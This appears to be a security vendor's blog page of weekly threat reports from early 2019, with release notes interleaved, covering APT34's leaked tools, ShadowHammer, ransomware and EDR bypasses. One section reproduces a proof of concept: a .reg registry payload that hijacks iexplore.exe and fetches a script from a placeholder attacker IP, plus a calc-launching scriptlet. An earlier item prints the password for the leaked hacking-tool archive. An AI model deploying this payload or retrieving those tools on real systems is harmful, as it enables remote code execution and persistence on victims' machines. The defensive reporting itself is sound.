Threat Report

Thursday April 18, 2019

Release Notes

April 23, 2019

Misc charts and detail view updates
All orgs onboarding progress
Sensor Outage Email to include additional information
Export escalated alerts as json or csv
Sorting, filtering, and actions for pages
ConnectWise Billing integration
Sensors - endpoint isn’t returning data
Updating ConnectWise integration for large MSP (Perch SOC) takes too long
Intel recent indicators shows infinite spinner
Onboarding_complete_at gets set when onboarding has not been finished
Indicator backtesting is not returning results

Threat Report Thursday April 18th 2019

on April 18, 2019

We’ve got a quick update for you this week on some news that’s getting attention. APT34 leaks hack tools, Common VPN software has a critical vulnerability patched, and Microsoft underestimates the exploitability of a remote code execution vulnerability. Additionally, an information technology firm from India has been compromised and is being leveraged in attacks against their own customers. Let’s get going.

APT34 hacking tools leak

As reported by zdnet, yesterday some of the tools used by OilRig attack group have been leaked by a group of Iranian hackers called “Lab Dookhtegan”. Lab Dookhtegan started leaking information about the operations of APT34 / OILRIG which supposedly would be the Iranian Ministry of Intelligence. However, this could be false attribution as well. The tools include:

  • Glimpse (newer version of a PowerShell-based trojan that Palo Alto Networks names BondUpdater)
  • PoisonFrog (older version of BondUpdater)
  • HyperShell (web shell that Palo Alto Networks calls TwoFace)
  • HighShell (another Web shell)
  • Fox Panel (phishing kit)
  • Webmask (DNS tunneling, main tool behind DNSpionage)

The full leak and tools were published on Lab Dookhtegan Telegram Channel with 30 members and can be downloaded here. Please make sure you use proper security steps such as sandbox and isolated environments. Open these files at your own risk. You can check more write up details on this GitHub page.

The origin of the leaked files is unknown and was not inspected for 0-day traps.

Pass: vJrqJeJo2n005FF*

VPN applications insecurely storing session cookies

Virtual Private Networks (VPNs) are used to create a secure connection with another network over the internet. As disclosed in a recent CERT advisory, multiple Virtual Private Network (VPN) applications store the authentication and/or session cookies insecurely in memory and/or log files.

  • CWE-311: Missing Encryption of Sensitive Data

The following products and versions store the cookie insecurely in log files:

  • CVE-2019-1573: Palo Alto Networks GlobalProtect Agent 4.1.0 for Windows and GlobalProtect Agent 4.1.10 and earlier for macOS0
  • CVE-2019-11213: Pulse Desktop Client 9.0R2 and earlier and 5.3R6 and earlier; Pulse Connect Secure (for Network Connect customers) 9.0R2 and earlier, 8.3R6 and earlier, and 8.1R13 and earlier

The following products and versions store the cookie insecurely in memory:

  • CVE-2019-1573: Palo Alto Networks GlobalProtect Agent 4.1.0 for Windows and GlobalProtect Agent 4.1.10 and earlier for macOS0
  • CVE-2019-11213: Pulse Desktop Client 9.0R2 and earlier and 5.3R6 and earlier; Pulse Connect Secure (for Network Connect customers) 9.0R2 and earlier, 8.3R6 and earlier, and 8.1R13 and earlier
  • Cisco AnyConnect 4.7.x and prior

Microsoft underestimates exploitability of DHCP bug

Microsoft has given the DHCP bug a low criticality score. However, a researcher on a Russian forum has posted information showing how the vulnerability can be exploited for remote code execution on a DHCP client. A rogue DHCP server in your environment could exploit this to hack all of your machines. Microsoft has offered updated guidance on the vulnerability.

Wipro hacked and targeting their own customers

Brian Krebs reported that Indian information technology firm, Wipro, has likely been compromised and hackers are using their foothold to attack Wipro customers.

KrebsOnSecurity heard independently from two trusted sources that Wipro, India’s third-largest IT outsourcing company was dealing with a multi-month intrusion from an assumed state-sponsored attacker.

Both sources, who spoke on condition of anonymity, said Wipro’s systems were seen being used as jumping-off points for digital phishing expeditions targeting at least a dozen Wipro customer systems.

The security experts said Wipro’s customers traced malicious and suspicious network reconnaissance activity back to partner systems that were communicating directly with Wipro’s network.

One source familiar with the forensic investigation at a Wipro customer said it appears at least 11 other companies were attacked, as evidenced from file folders found on the intruders’ back-end infrastructure that were named after various Wipro clients. That source declined to name the other clients.

Release Notes

April 8, 2019

Filter links to a single customer on indicator details
Extended storage for logs
Include recent flow_id in api response
New on-boarding wizard
Cannot click link to sensor and bring up sensor page
500 Error on Basic Authentication
Weekly update email doesn’t get complete data
Issue with 2FA logins due to email confirmation cage router
Community Pages/ View All - Recent True and False Positives not working
Redirect user back to original page after login
Contacts text field is losing focus on autosave

Threat Report Thursday April 4th 2019

on April 4, 2019

This week Skylight Cyber bursts Kaspersky’s Shadowhammer bubble. Dive into some Apache and PHP 0-days. Also, both Cisco and Georgia tech learn that there are no second chances in security.

BARIUM likely responsible for Shadowhammer

Kaspersky is slow dripping information on Shadowhammer, but the community is not waiting. Out of 57,000 observed infections Kaspersky identified only 600 targets Shadowhammer targeted for second stage infection. Shadowhammer identifies targets based a unique identifier assigned to a network interface controller (NIC), called a media access control address (MAC address).

In the possibly the least efficient method of sharing information possible, Kaspersky created an executable and a website for you to submit your MAC address and see if you were one of the 600 known to be sought out by Shadowhammer. This seems like sharing but is actually not sharing. By not giving out the list and making everyone check their site and run their executables, Kaspersky can gather additional data about who was targeted by seeing where positive matches are coming from and getting some secondary intel for the talks they are planning later.

A group called Skylight Cyber popped up and wasn’t having it. They extracted and published the MAC addresses from the executable to their recently registered site. Here they are on github. You can double check their work by using the Kaspersky site to look up a MAC address.

I ran the list of MACs through two different vendor lookup databases to see what vendors were associated with these MACs. Then I found out someone else already did this so I’m just going to include their work.

vendor lookup databases

There were interesting things to note from this data. A majority of the targeted MAC addresses are related to vendors from Taiwan that make up our technology supply chain, with the exceptions being Huawei, VMware, and Intel. With so few MAC addresses targeted, I assume that the threat actor used MAC addresses as a way to single out targets of interest they had identified in some other way. This may have been through some ASUS internal data.

A MAC address doesn’t typically leave your local network. So, it’s not something a remote attacker would know. This was not an elaborate drag net this was very focused.

If I were at some of these companies higher in prevalence like AzureWave Technologies, Liteon Technology, or Hon Hai Precision, I would be taking a good look around. There is a chance that they are actively targeting your employees. They might be targeting the exact employees they need to install more undetected supply chain backdoors. Remember we only got approximately 600 MAC addressed observed from 57,000 of a potential 1,000,000 infections. If that pattern held true, there could be 10,526.3 targeted MAC addresses.

AzureWave Technologies, Inc (Taiwan) – Manufactures and sells wireless connectivity and image processing solutions worldwide.

Lite-On (Taiwan) - Primarily manufactures consumer electronics, including LEDs, semiconductors, computer chassis, monitors, motherboards, DVD, and CD devices, and other electronic components.

Hon Hai Precision Ind. Co.,Ltd (Taiwan) – Trading as Foxconn Technology Group and better known as Foxconn, is a Taiwanese multinational electronics contract manufacturing company.

There is a good chance we already know who is responsible for Shadowhammer. Certain evidence collected draws a link to the ShadowPad incident from 2017. The actor behind the ShadowPad incident has been publicly identified by Microsoft in court documents as BARIUM. BARIUM is an APT actor known to be using the Winnti backdoor. Recently, ESET wrote about another supply chain attack in which BARIUM was also involved.

The following indicators were indicators of compromise related to Shadowhammer.

Domains and IPs:

  • asushotfix[.]com
  • 141.105.71[.]116

Some of the URLs used to distribute the compromised packages:

  • hxxp://liveupdate01.asus[.]com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/
  • hxxps://liveupdate01s.asus[.]com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/
  • hxxps://liveupdate01s.asus[.]com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/
  • hxxps://liveupdate01s.asus[.]com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/

Hashes (

  • aa15eb28292321b586c27d8401703494
  • bebb16193e4b80f4bc053e4fa818aa4e2832885392469cd5b8ace5cec7e4ca19

Carpe Diem: The story of a PHP 0-day and an Apache privilege escalation

Apache has been vulnerable to a local root privilege escalation from October, 2015 to Aril, 2019 due to an out-of-bounds array access leading to an arbitrary function call. The vulnerability is triggered when Apache gracefully restarts. In standard Linux configurations, the logrotate utility runs this command once a day, at 6:25AM, in order to reset log file handles. Carpe Diem.

This vulnerability affects mod_prefork, mod_worker and mod_event. Based on the researcher’s report, the success rate of the exploit is 100 percent if Apache has more than four workers. But, if the exploit fails, it can be restarted the next day as Apache is not interrupted. Apache’s error.logwill nevertheless contain notifications about its workers segfaulting.

The researcher also disclosed a PHP use after free zero day in this report that he chained with the Apache vulnerability to get remote code execution. Based on his report PHP never responded to the vulnerability report. This isn’t the only Apache vulnerability to make some waves recently. Check out CVE-2019-0211 while you’re at it.

Cisco fumbles RV320 critical code execution patch

RedTeam Pentesting has recently release information on three Cisco vulnerabilities for the Cisco RV320 web UI, which were previously patched by Cisco in firmware version It appears that the patch was insufficient to prevent exploitation. The Cisco RV320 web interface is still vulnerable to unauthenticated command injection, diagnostic retrieval, and configuration export. Based on the reporting timeline Cisco had six months to fix these critical vulnerabilities and their solution was to block requests with a Curl user-agent. When the researcher reported that the fix was insufficient Cisco requested more time, however the researcher declined to extend the publishing date. As far as I am aware, there is no patch available for these vulnerabilities. You should limit access to the web interface for the Cisco RV320 until Cisco can get it patched up for good.

Threat Report Wednesday March 27th 2019

on March 27, 2019

Supply chain attacks have been a growing threat for years. For any growing business, a dependence upon partners allows for the business to focus on their core mission. In many cases, this can typically involve either making technology partnerships or adopting technology platforms through mergers and acquisitions. Any of these changes require analysis to determine what new risks may be incurred. This week we’re focusing on recent news related to supply chain attacks, and the risks of adopting new technology through adoption or acquisition.

Microsoft uncovers Huawei PCManager exploitation

Third-party kernel drivers are becoming a more appealing target for attackers and an important area of research for security analysts. A vulnerability in a signed third-party driver could have a serious impact: it can be abused by attackers to escalate privileges or bypass driver signature enforcement—without requiring discovery and use of a Windows 0-day.

Computer manufacturers usually ship devices with software for device management. This software contains components that run with ring-0 privileges in the kernel. With these components installed by default, each must be as secure as the kernel.

Microsoft recently traced some anomalous behavior to a device management driver, PCManager, developed by Huawei. They found a lapse in the design that led to a vulnerability that could allow local privilege escalation. Huawei has come under major fire from critics as allegedly being an espionage arm of the Chinese government. Huawei has been pursuing plans to roll out a 5G network that the Five Eyes (FVEY) reportedly are working against as it could impact their ability to collect intelligence signals.

Microsoft reported the vulnerability (CVE-2019-5241) to Huawei. On January 9, 2019, Huawei released a fix. Windows Defender will now detect successful privilege escalation exploiting the HwOs2Ec10x64.sys watchdog vulnerability as demonstrated in the screenshot on the Microsoft Vulnerability Research blog.

Privilege escalation

ASUS serves up Shadowhammer trojan to one million customers

Huawei wasn’t the only manufacturer catching press last week. Researchers discovered that a threat actor modified the ASUS Live Update Utility, which delivers BIOS, UEFI, and software updates to ASUS laptops and desktops, added a back door to the utility, and then distributed it to users through official channels.

The trojan utility was signed with a legitimate certificate and was hosted on the official ASUS server dedicated to updates, and that allowed it to stay undetected for a long time. The threat actor even made sure the file size of the malicious utility stayed the same as that of the original one. Just, wow. The level of access they had here is insane.

According to Kaspersky researchers, it was distributed to about one million people total. The cybercriminals behind it were not interested in all of them, however — they targeted only 600 specific MAC addresses, for which the hashes were hardcoded into different versions of the utility. My first thought was: Surely there are better ways to hack 600 specific machines than trying to scoop them into a net of a million. Interesting technique here.

There is obviously a lot more to this story. If you want to check if you’re the target of this mystery, Kaspersky released a MAC checking service rather than just giving us the 600 MAC addresses. I’m sure they’ll leak out at some point.

In addition to ASUS, the same techniques were used against software from three other vendors. Those vendors were not disclosed at this time. Update the ASUS Live Update Utility if you use it or just consider burning your ASUS.

Please allow me to put on my tin foil hat. With all these vulnerabilities baked in by manufactures (that are actively being used on a large scale by a sophisticated actor) it is almost like this is not a coincidence. It is almost like there is an objective to infiltrate organizations through their technology.

Razer denies vulnerability, declines fix

In similar news from a different source, a little bird tells me that Razer Laptops have a vulnerability affecting all current laptops where the SPI Flash is set to full read/write and the Intel CPU is left in Manufacturing Mode. This allows for attackers to safeguard rootkits with Intel Boot Guard, downgrade the BIOS to exploit older vulnerabilities such as Meltdown, and many other things. According to the report, “[Razer] have yet to look into getting a CVE assigned, saying it isn’t necessary.”

Bloomberg stands by story fingering the People’s Republic for infiltration

Based on all of this suspicious activity, is it really hard to imagine that Bloomberg got their recent story reporting right? They have never retracted this story. They stand by this story of Supermicro hardware supply chain being infiltrated to plant some rogue technology. According to their reports, “the attack by Chinese spies reached almost 30 U.S. companies, including Amazon and Apple, by compromising America’s technology supply chain, according to extensive interviews with government and corporate sources.”

Based on Bloomberg’s reports, it was Amazon that discovered the implant during acquisition due-diligence of startup Elemental Technologies to help with a little streaming video service you may have heard of, Amazon Prime Video.

Nested on Elemental Technologies’ servers’ motherboards, the testers found a tiny microchip, not much bigger than a grain of rice, that wasn’t part of the boards’ original design. According to Bloomberg, “Amazon reported the discovery to U.S. authorities, sending a shudder through the intelligence community. Elemental’s servers could be found in Department of Defense data centers, the CIA’s drone operations, and the onboard networks of Navy warships. And Elemental was just one of hundreds of Supermicro customers.”

This report by Bloomberg has been denied, but (tinfoil hat) that may be because this breach was too large and too impactful to be confirmed. If Bloomberg got it right, then the Five Eyes are right to be concerned about Chinese government efforts to use private Chinese companies as an espionage arm to implant backdoors to infiltrate organizations and governments on a global scale.

We have reported on the security risks of mergers and acquisitions in the past, like what happened to Marriot and Starwood where data of 500 million customers was breached. Perchy recommends security monitoring before, during, and after M&A activity to protect against infiltration.

ConnectWise Launches New Security Assessment Tool for Managed Service Providers

Perchy on March 26, 2019

ConnectWise today announced the launch of ConnectWise Identify™ which allows managed service providers (MSPs) to easily assess their own and their customers’ current security posture against a wide variety of malicious cybersecurity threats. The result is an easy-to-understand, customized risk report with remediation options, all from a single pane of glass, that has implications for the entire business, not just the network.

View the rest of the article here.

Release Notes

March 25, 2019

Add sensor name to the Sensor Detail page
Org should persist on refresh
Improve Perchybana dashboard importing speed
Require users sign ToS
Confirm emails for new users
Sensor outage emails
Fix counting issue on new record creation
Suppression statistics always show 0%
2FA status shows as unknown
The remediation graph on the right isn’t displaying data
Sensor details does not load
IP Count for MSP isn’t showing when MSP is selected
Details page is too wide and scrolls on some screens
Inaccurate private IP counts
Use Indices Queries to select indexes, keeping URLs short

Threat Report Wednesday March 20th 2019

on March 20, 2019

Ever wonder what attackers do once they get code execution to your hosts? Easy, they roll out ransomware or crypto miners to maximum effect. This week we’re focusing on rats, ransoms, and miners.


Remote access trojans (RATs) on a corporate system may serve as a key pivot point to access information laterally within an enterprise network. By analyzing network metadata, Recorded Future analysts were able to identify RAT command-and-control (C2) servers, and more crucially, which corporate networks were communicating to those controllers.

Researchers from Recorded Futures partnered with Shodan Malware Hunter project to identify active malware controllers for 14 malware families between December 2, 2018 and January 9, 2019. They focused their analysis on a subset of malware — Emotet, Xtreme RAT, and ZeroAccess — to profile RAT communications from third-party organizations to the controllers. You should check out the full analysis on their site.

Trojans and RATs pose significant threats to government and company networks around the world. For instance, the developers behind Emotet continue to innovate and develop modularized functionality to aid propagation efficacy and evade traditional network defenses; resulting in widespread infection which according to a US-CERT alert issued in July 2018, have cost state, local, tribal, and territorial (SLTT) governments up to $1 million per incident to remediate.


Xtreme RAT CnC 

Emotet CnC 

Ransom demands for world’s largest aluminum manufacturer

Norwegian power and metals giant, Norsk Hydro, is battling an extensive ransomware outbreak on its computers. Norsk Hydro is one of the world’s biggest makers of aluminum with sites in 50 countries. On Tuesday it was stated that ransomware had infected its IT systems in the U.S. and Europe. This cyber-intrusion forced a shutdown of its global computer network to contain the spread. Workers have had to switch to manual operations at its plants or temporarily halt production entirely as a precaution.

Norsk Hydro did not say whether the cyber-plague is limited to office PCs or if embedded industrial control hardware was also infected by the malware. Presumably, the software nasty has encrypted documents and data, and is demanding a ransom be paid to restore the files. It sounds as though the infection, described as “severe” by CFO Ivan Eivind Kallevik, was kept within its office network.

“IT systems in most business areas are impacted and Hydro is switching to manual operations as far as possible,” Norsk Hydro said in a statement today. “Hydro is working to contain and neutralize the attack, but does not yet know the full extent of the situation.”

A company spokesperson told The Register that the infection is believed to have originated in America. Media reports have named LockerGoga as the ransomware culprit, though Norsk Hydro told us that this particular malware is just one of several possible suspects.

So far there is no indication that Norsk Hydro has any plans to pay the ransom, and there’s still no news on restoring the encrypted systems and how long it will impact day-to-day operations.

Norsk Hydro ASA confirmed that a ransomware attack was behind production outages across the aluminum producer’s operations in Europe and the United States.

The perpetrators are still unknown, but the work is similar to other recent breaches. The Norwegian company, one of the world’s biggest aluminum producers, called the situation “quite severe,” and said it was still working to contain the effects. It couldn’t immediately detail how much output had been impacted but said the so-called potlines, which process molten aluminum and need to be kept running 24 hours a day, had switched to manual mode.

This attack does share characteristics with other attacks that have been observed. It’s important to share intelligence so that fewer of us are impacted by new threats. Mining companies are recommended to join information security and analysis sharing groups like MM-ISAC so they can stay aware of threats targeting mining companies.

CryptoSink asks, “How strong is your Kung-Fu?”

Researchers have discovered a new crypto-mining campaign targeting Elasticsearch instances which contain sinkholing capabilities to squash any competing miners.

The aptly named “CryptoSink” malware campaign exploits an Elasticsearch vulnerability from 2014 (CVE-2014-3120) to mine cryptocurrency in Windows and Linux environments, according to F5’s Andrey Shalnev and Maxim Zavodchik.

At the time of the research, just one of the three hard-coded C&C domains was operational, resolving to a server located in China.

However, most interesting was the way it finds and kills any competing crypto-mining malware on the same host.

Typically, attackers do this by scanning running processes to find known malware names, or else looking to see which processes are consuming the most CPU.

“In this case, the malware dropper introduces a more sophisticated tactic to paralyze competitors who survive the initial purge. We’ve called it ‘CryptoSink’ because it sinkholes the outgoing traffic that is normally directed at popular cryptocurrency pools and redirects it to localhost ( instead,” F5 explained.

“It achieves this by writing the target pools’ domains to the ‘/etc/hosts’ file. In doing so, the competitors’ miners are not able to connect to those cryptocurrency pools and fail to start the mining process, which frees up system resources on the infected machine.”

The malware has another trick up its sleeve, this time to achieve persistence. It renames the original rm binary relating to the Linux “remove” command, to “rmm” and replaces it with a malicious file named “rm”, downloaded from its C&C server.

“Now, each time the user executes the rm command, the forged rm file will randomly decide if it should additionally execute a malicious code, and only then will it call the real rm command (that is, execute the file now that’s now named rmm). The malicious code in the rm binary will check if the cronjob exists and if not, it will be added again,” F5 explained.

“The irony is that even if the infected server’s administrator were to detect the other malicious files and try to remove them, she would probably use the rm command which, in turn, would reinstall the malware.”

Threat Report Wednesday March 13th 2019

on March 13, 2019

This week we’re going learn about some 0-day vulnerabilities that have been running wild. Then we’re going to close out with some techniques red teamers and threat actors are using to bypass controls, pop shells, escalate privilege, and own your systems.

Four horsemen of the exploit apocalypse ride wild

In February, researchers reported to Microsoft that attackers in the wild were using a 0-day exploit to escalate Windows privileges. Microsoft has just released a patch crediting Kaspersky Lab researchers, Vasiliy Berdnikov and Boris Larin, with the discovery of a vulnerability in win32k.sys, classified as CVE-2019-0797.

Like CVE-2018-8589, researchers believe this exploit is used by several threat actors including, but possibly not limited to, FruityArmor and SandCat. While FruityArmor is known to use 0-days, SandCat is a new APT discovered recently and was not previously known to use 0-days. In addition to CVE-2019-0797 and CHAINSHOT, SandCat also uses the FinFisher/FinSpy framework.

CVE-2019-0797 is a race condition that is present in the win32k driver due to a lack of proper synchronization between undocumented syscalls. In addition to CVE-2018 8589, CVE-2018-9611, and CHAINKILL, CVE-2019-0797 is, according to Kaspersky researchers, the fourth horseman in a wild 0-day apocalypse.

The exploit was targeting 64-bit operating systems in the range from Windows 8 to Windows 10 build 15063. The exploitation process is performed using heap spraying palettes and accelerator tables. In exploitation of Windows 10 build 14393 and higher, Windows are used instead of palettes. Besides that, the exploit performs a check on whether it’s running from Google Chrome and stops execution if it is because vulnerability CVE-2019-0797 can’t be exploited within a sandbox.

Sneaky sneaky bypasses

Last week we discussed some novel news in ransomware distribution which included a technique for bypassing windows security controls. Attackers haven’t stopped discovering new ways to distribute malware. Now they are compromising PirateBay accounts to seed out malicious files using trusty worthy looking accounts. Let’s check out some more sneaky techniques (Proof of Concept included) that attackers use land and stick their infections on Windows 10 with VBA macros and dialog box spoofing. Even when Cylance is present.

MDSec silences Cylance

At AppSecEU 2014 in Cambridge, I had the opportunity to take a mobile application hacking course with MDSec CEO and Mobile Application Hacker Handbook author, Domnic Chell. I am as impressed by the folks today at MDSec today as I was then. In a recent publication by his team, they describe bypassing some of the most common CylancePROTECT controls. For defenders using Cyclance, this provides insight into understanding where gaps in your security controls might exist and how to effectively layer complementary solutions to reduce risk.

Some of these gaps are straight forward. For instance, CylancePROTECT has no restrictions on Excel 4.0 macro enabled documents, even when explicitly blocked by policy. This provides an effective means for obtaining initial access in a Cylance environment. Old school evil Excel 4.0 macros have been covered in detail by Stan Hegt.

Other methods for bypassing Cylance are more complicated. For instance, it is possible to bypass CylancePROTECT powershell control if you rename the PS executable, execute it, and modify it in memory after execution to avoid impacting the signature of the binary. Quite brilliant. You should really read the entire write up on MDSec’s site for full details and more info about CylanceOPTICS.

VBA macro PoC for parent process spoofing

Most modern EDR solutions use behavioral detection, allowing the detection of malware based on how it behaves instead of solely using static indicators of compromise (IoC) like file hashes or domain names. In a recent post, Christophe gives a VBA implementation for two techniques allowing you to spoof both the parent process and the command line arguments of a newly created process. This implementation allows crafting stealthier Office macros, making a process spawned by a macro look like it has been created by another program such as explorer.exe, and has benign-looking command line arguments.

A Proof of Concept was released containing a VBA macro spawning a process with a spoofed parent and command line.

VBA Macro

Windows .reg file dialog box message spoofing

On March 10, a disclosure from @hyp3rlinx caught my eye related to dialog spoofing for Windows .reg files. But Microsoft has not acknowledged it as a vulnerability or failed to understand what was being reported as a vulnerability. Or, maybe this is a feature working as intended. According to the researcher, they received a response from Microsoft MSRC saying, “A registry file was created with the title you suggested, but the error message was clear.” and a link to the definition of a security vulnerability. It seems to me that if someone was able to override SSL certificate warning dialogs with a specially crafted certificate name then that would get some attention. Why is this not getting traction?

The Windows registry editor allows specially crafted .reg filenames to spoof the default registry dialog warning box presented to an end user. This could trick users into choosing the wrong option in the dialog box. Also, it’s possible to suppress the modification status (Win 10), hiding successful registry modifications.

Normally when a user opens a .reg file UAC will launch, after they will get the registry security warning dialog box asking them if they “trust the source” and “Are you sure you want to continue?”

However, it is possible to inject your own pop up message and suppress successful registry modifications through a crafted filename.

Typically, upon a successful import the registry editor pops up another dialog box with a status message telling us “the keys and values contained in have been successfully added to the registry”.

Here is a video of the PoC in action used to execute code from a remote host (you might want to mute the video) and here are steps to re-create it yourself:

1) Create a Windows .REG Registry file named.


Registry file Contents.

Windows Registry Editor Version 5.00 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe] 

"debugger"="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication\";document.write();GetObject(\"script:http://<ATTACKER-IP>/backdoor\")" 

2) Create an XML file hosted at http://ATTACKER-IP/backdoor named simply as “backdoor” will execute Windows calc.exe when Microsoft Internet Explorer is launched.

<?xml version="1.0"?> 
<component id="testCalc"> 
<script language="JScript"> 
new ActiveXObject("WScript.Shell").Run("calc.exe"); 

Release Notes

March 11, 2019

Allow opening navigation links in new tabs
Child Customer IP counts
Make comments more accessible
Side navigation revamp
Add option to open some links in existing or new tab
Since You’ve Been Gone does not wrap or truncate
No Analyzers to Run
Noisy alerts cause alert queue to back up
Some ConnectWise companies are not returned in configuration dropdown

Threat Report Thursday March 7th 2019

on March 7, 2019

This week we’re focusing on ransomware. Let’s take a look at two new pieces of ransomware, a ransomware infrastructure service, how ransomware is distributed, and what you can do about it. Spoiler, if you don’t already have plans to secure backups of your mission critical data, you’re going to make some after this week’s threat report.

Jokeroo RaaS is ready for your SaaS

Last week I predicted a GandCrab variant would be released on a specific underground, and looky here. There is a new Ransomware-as-a-Service (RaaS) being offered that originally marketed itself as GandCrab v2.

“Jokeroo RaaS” was recently discovered and is being promoted on underground forums and via Twitter. The program allows affiliates to gain access to fully functional ransomware and payment server. A Ransomware-as-a-Service is an online service that allows affiliates to sign up and distribute the ransomware. Chatter shows that the Jokeroo RaaS began promoting itself as a GandCrab ransomware RaaS but changed their name to Jokeroo RaaS.


To become an affiliate, would-be criminals pay to join with membership packages ranging from $90 up to $600 USD. This is another example of how the security marketplace and the threat marketplace are maturing together. We get Security-as-a-Service. They get Ransomware-as-a-Service.

It’s nothing personal, just business for CLOP ransomware

A new variant of ransomware has been discovered by researchers. Clop Ransomware which appends the “. CLOP” extension to the encrypted files is targeting your entire network, not a single computer. Clop Ransomware is being distributed via code signed executables with a digital certificate to appear more legitimate and may help to bypass security software detections. In an analysis performed by the researchers, the malware will create a batch file named “clearnetworkdns_11-22-33.bat.”

Once executed, the malware terminates numerous Windows services and processes to disable running antivirus software on the computer to encrypt a potential victim file. Then, the final stage of the attack is the victim will receive a ransom note containing the emails “”, “”, and “” that can be used to contact the attackers for payment instructions.

Malware Infrastructure-as-a-Service
Malware Infrastructure-as-a-Service







Novel news on ransomware distribution

One of the primary distribution methods for ransomware is through email campaigns that include a link to a malicious file or attach a malicious file. The trick to having a good link lure is to have a reputable looking site. Dark Web services make it easy for attackers to setup legitimate looking infrastructure like registering domains, SSL certificates, and setting up e-commerce sites. Additionally, it can all be bundled with ransomware for a discount. This shared infrastructure and software makes attribution harder for researchers by providing threat actors with cover in the form of shared threat indicators.

One of the premier underground marketplaces for this infrastructure and identity service is DreamMarket. According to researchers, “This package of products and services allows attackers to credibly present themselves as a trusted US or UK company for less than $2,000.”


On the email attachment side of spreading ransomware, attackers need to make sure that their attachments won’t be detected as suspicious in transit or when executed. A common file format for malspam or spear phishing is a Windows office document.

Speaking of threaty threats, Windows documents have been evading detection; the Equation editor exploit popped back up by chaining in an unknown vulnerability. This exploit chain allows it to stealth past some native Windows security controls.

According to researchers, they “spotted an attacker group, which seems to originate from Serbia, using specially-crafted Microsoft Word documents to take advantage of how Microsoft Word handles Integer Overflow errors in the OLE file format. The group was able to exploit this vulnerability to circumvent many security solutions designed to protect data from infestation, including leading sandbox and anti-malware technologies.”

With new ransomware, ransomware infrastructure services, and 0-day vulnerabilities that bypass security controls you can see that the focus is coming back to Ransomware. Attackers are able to extract more money from ransomware than from cryptocurrency mining. Not all campaigns are asset aware and know the value of the data they have compromised. Once attackers mature in this area, they will deploy cryptocurrency miners when the asset they land on is not worth ransoming. I predict we’ll have some malware that can deploy either or, depending on a scan of the file system and open connections.

The most important thing that you can do to make sure your organization is protected from ransomware is to create secure backups that attackers will not be able to erase/encrypt. That may mean storing backups outside of IT’s normal span of control.

Docker vulnerability running wild with Monero miner

Not all infections are the result of lateral movement from infected end users. In a recent threat report we covered the Docker RunC vulnerability CVE-2019-5736.

CVE-2019-5736 allows the attacker to gain root access from a Docker container by overwriting the host runC binary as root. According to researchers, “3,822 Docker hosts with the remote API exposed publicly. The exposed Docker remote API has already been abused by attackers using the compromised hosts to mine cryptocurrency.” Researchers reported that the exposed Docker remote API IPs are running Monero cryptocurrency miners.

Although these Docker hosts were used to mine cryptocurrency, it would have been just as easy for the attackers to deploy ransomware. Since this was likely just a large scan of the Web and not a targeted campaign, the attackers had no idea if the assets had valuable data.

Bonus: Ghidra NSA reverse engineering tool

Oh yeah, RSA was this week and the NSA released an open source reverse engineering tool called Ghidra (and it has its own song). This sounds very cool and I like to see powerful tools made open source so we can get more people involved in solving problems. But I immediately reached for my tin foil hat.

Could it be that the NSA has released a reverse engineering tool that backdoors security researchers? Or, maybe it collects and ships home binaries and debug data to crowd source 0-day discovery? Luckily, researchers have already started looking into the source code.

Hacker Fantastic

Hacker Fantastic realized that when in debug mode Ghidra binds to all network interfaces on port 18001 and allows for remote code execution through Java Debug Wire Protocol (JDWP). While it’s not atypical to have a debug access like this, the docs don’t make it clear that this is happening, and it should not be binding to all interfaces as a default behavior. Ideally, Ghidra would default to localhost. The issue is being discussed on the NSA Ghidra repo. As a bonus to the bonus here is a JDWP shellifier.

How can I help?

on March 5, 2019

“How can I help?” – seems like a simple question to ask. It wasn’t until I started watching a new medical drama last fall that I started asking this question myself. In the show, the premise of the question is supposed to invoke optimism and hope in a profession that is otherwise known for the bureaucratic red tape of the healthcare system. Fortunately, in my line of work it is not as regulated as this (even though it could be – let’s save that for another blog), but in asking this question of my colleagues, partners, and clients it has provided me a wealth of opportunity that I would otherwise not have experienced.

I’ve asked this question to colleagues and in turn have been placed on projects where I’ve had the pleasure of meeting new people and expanding my skillset. I’ve asked this question to partners to find out that the pain point wasn’t about price or lack of functionality, but rather their customers not understanding how to incorporate new technology. I’ve also asked this of clients to uncover their uncertainty of presenting a solution internally to leadership.

I ask not out of optimism or hope like the medical drama I watch, but from curiosity and empathy. What can I do to impact a given situation by asking a simple question? So, whether you’re a colleague looking for advice or just a conversation over coffee, a partner looking to create a new revenue stream or operationalize your business, or a client looking for someone to listen to them – I leave you with this…How can I help?

Release Notes

February 28, 2019

  • Managing providers can see their customers’ providers to help coordinate responses to threats
  • Filter by geo points in Perchybana
  • Dashboards in Perchybana now support src_ip

  • Bug fixes and tweaks for the new navigation
  • Fixed a bug where status was not displaying in some alert status change emails

Threat Report Wednesday February 27th 2019

on February 27, 2019

Welcome back to our regularly scheduled weekly threat report. There was malware last week. There is malware this week. And, there will be malware for the foreseeable future. Oh, and malware’s best friend, some vulnerabilities too.

Hackers turn to LinkedIn for More_Eggs

Since mid-2018, a campaign spreading More_Eggs malware has targeted U.S. companies in industries that commonly use online payment portals like retail, entertainment, and pharmacy. More_Eggs spreads via LinkedIn’s legitimate direct messaging service, offering fake jobs to victims and repeatedly following up via email to deliver the backdoor More_Eggs. In direct follow-up emails, the actor pretends to be from a staffing company with an offer of employment. In many cases, the actor points the victim to a fake website that impersonates a legitimate staffing company and hosts the malicious payload. In other cases, the actor uses malicious attachments to directly distribute More_Eggs. The actor uses LinkedIn scraping, multistep contacts with recipients, personalized lures, and multiple varied attack techniques to distribute More_Eggs – indicating increasing effectiveness of layered defenses.

This activity sounds a lot like the near breach of Redbanc, Chile’s interbank ATM network, that we included in a threat report from January 2019. At the time, researchers found the exe downloaded was PowerRatankba and attributed it to Lazarus (aka Hidden Cobra).

Users are advised to exercise caution when viewing messages from suspicious senders, avoid clicking links or attachments from such senders, and employ a blend of antivirus and network security monitoring to best mitigate the risk of attack. The following indicators of compromise were released with researchers’ findings.


















Malware from OneDrive

